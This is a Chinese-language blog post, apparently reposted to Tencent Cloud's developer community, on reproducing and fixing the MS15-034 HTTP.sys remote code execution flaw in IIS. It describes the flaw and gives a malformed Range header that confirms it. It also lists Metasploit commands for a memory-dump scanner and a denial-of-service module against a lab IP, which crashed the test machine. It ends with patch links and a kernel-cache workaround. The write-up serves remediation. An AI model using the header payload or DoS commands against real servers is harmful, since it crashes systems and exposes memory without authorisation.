前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >HTTP.sys远程代码执行漏洞修复

HTTP.sys远程代码执行漏洞修复

作者头像
全栈程序员站长
发布2022-09-09 11:31:09
1.3K0
发布2022-09-09 11:31:09
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

1.漏洞描述

Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。

2.复现环境

win7+IIS7

3.漏洞确认

访问IIS界面,使用burpsuite抓包,发送到repeater中,在HTTP请求头中加入如下字段 Range: bytes=18-18446744073709551615 ,返回416状态码

4.漏洞利用

使用kali的metasploit msconsole search ms15-034

验证漏洞的方法 use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 192.168.1.200 run

利用漏洞的方法 use auxiliary/dos/http/ms15_034_ulonglongadd set rhosts 192.168.1.200 set threads 10 run

实验电脑已经蓝屏

5.漏洞修复

方法1:微软官方网站下载ms15-034的补丁包 下载地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 代表性补丁: Windows Server 2008 R2(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46480 Windows Server 2012(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46481 Windows Server 2012 R2(KB3042553):https://www.microsoft.com/zh-cn/download/details.aspx?id=46500

方法2:网上的其他方法验证 IIS-功能视图-输出缓存-操作-编辑功能设置-启用内核缓存,取消勾选。 注意: 在网站-default web site下的输出缓存,不是根目录下的输出缓存; 修改后,漏洞验证仍显示存在,但漏洞利用已不再蓝屏;

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/161443.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.漏洞描述
  • 2.复现环境
  • 3.漏洞确认
  • 4.漏洞利用
  • 5.漏洞修复
相关产品与服务
漏洞治理服务
漏洞治理服务(Vulnerability Governance Services,VGS),是指腾讯云为您提供的面向各种软硬件系统已知或未知漏洞的情报监测及漏洞修复相关能力,通过对全网一手漏洞渠道进行持续监测、研判及分析,帮助企业及时识别互联网上的最新漏洞威胁,并提供基于VPT的修复研判能力,帮助识别企业资产风险,为漏洞修复提供更宽松的时间窗口,保障业务安全。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档